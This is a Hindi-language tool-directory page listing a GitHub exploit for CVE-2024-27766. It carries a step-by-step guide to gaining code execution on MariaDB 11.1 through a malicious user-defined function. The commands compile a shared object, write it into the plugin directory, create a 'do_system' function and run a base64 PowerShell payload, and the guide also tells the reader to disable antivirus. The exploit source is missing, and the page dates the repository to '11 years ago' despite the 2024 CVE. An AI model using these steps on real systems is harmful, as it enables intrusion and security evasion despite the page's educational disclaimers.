Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mysql_CVE-2024-27766 — Database authenticated code execution | Kitploit
उपकरण/GitHubGitHub/hissec/mysql_cve-2024-27766
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationPayload DevelopmentDatabase Security
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Database authenticated code execution

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण पुनरुत्पादन मार्गदर्शिका (प्रभावित उत्पाद संस्करण MariaDB 11.1)

यह मार्गदर्शिका डेटाबेस सिस्टम पर User-Defined Function (UDF) हमले को पुनरुत्पादित करने के लिए चरण-दर-चरण निर्देश प्रदान करती है। कृपया ध्यान दें कि यह शोषण कुछ सिस्टम पर काम कर सकता है, लेकिन यह 64-बिट आर्किटेक्चर या कुछ बिल्ड पर सही ढंग से कार्य नहीं कर सकता है।

चेतावनी: यह केवल शैक्षिक उद्देश्यों के लिए है। इन तकनीकों का अनधिकृत उपयोग गैरकानूनी और अनैतिक है।

हमले को पुनरुत्पादित करने के चरण

1. UDF कोड डाउनलोड करें और तैयार करें

सबसे पहले, exploit.c नामक एक फ़ाइल बनाएं और निम्नलिखित कोड जोड़ें:

root@kitploit:~

2. UDF कोड संकलित करें

शोषण कोड को x86_64-w64-mingw32-gcc कंपाइलर का उपयोग करके संकलित करें:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -c exploit.c

3. एक साझा ऑब्जेक्ट फ़ाइल बनाएं

संकलित ऑब्जेक्ट फ़ाइल से एक साझा ऑब्जेक्ट फ़ाइल (exploit.so) उत्पन्न करें:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. साझा ऑब्जेक्ट फ़ाइल को हेक्साडेसिमल में बदलें

.so फ़ाइल को हेक्साडेसिमल प्रारूप में बदलने के लिए xxd का उपयोग करें:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. हेक्साडेसिमल मान को डेटाबेस में लोड करें

hex_value.txt से हेक्साडेसिमल मान कॉपी करें और अपने डेटाबेस में निम्नलिखित कमांड निष्पादित करें:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. प्लगइन निर्देशिका निर्धारित करें और शोषण तैनात करें

चलाकर प्लगइन निर्देशिका खोजें:

root@kitploit:~
DB> select @@plugin_dir;

फिर, प्लगइन निर्देशिका में शोषण साझा ऑब्जेक्ट बनाएं:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

नोट: अपने सिस्टम कॉन्फ़िगरेशन या विशिष्ट प्लगइन निर्देशिका के अनुसार पथ को समायोजित करें।

7. दुर्भावनापूर्ण फ़ंक्शन बनाएं

शोषण का उपयोग करके डेटाबेस में एक नया फ़ंक्शन बनाएं:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. शोषण निष्पादित करें

किसी भी एंटीवायरस या Windows Defender को अक्षम करें जो शोषण को अवरुद्ध कर सकता है। फिर, नवनिर्मित फ़ंक्शन का उपयोग करके एक कमांड चलाएं:

root@kitploit:~
DB> select do_system('powershell base64 here');

'powershell base64 here' को उस कमांड के base64 एन्कोडेड पेलोड से बदलें जिसे आप निष्पादित करना चाहते हैं।


अस्वीकरण: यह दस्तावेज़ केवल शैक्षिक उद्देश्यों और सुरक्षा अनुसंधान के लिए है। इस जानकारी के दुरुपयोग से आपराधिक आरोप और गंभीर कानूनी दंड हो सकते हैं। किसी नेटवर्क या सिस्टम पर किसी भी कमजोरी का परीक्षण करने से पहले हमेशा संबंधित अधिकारियों से अनुमति प्राप्त करें।

टूल डाउनलोड करें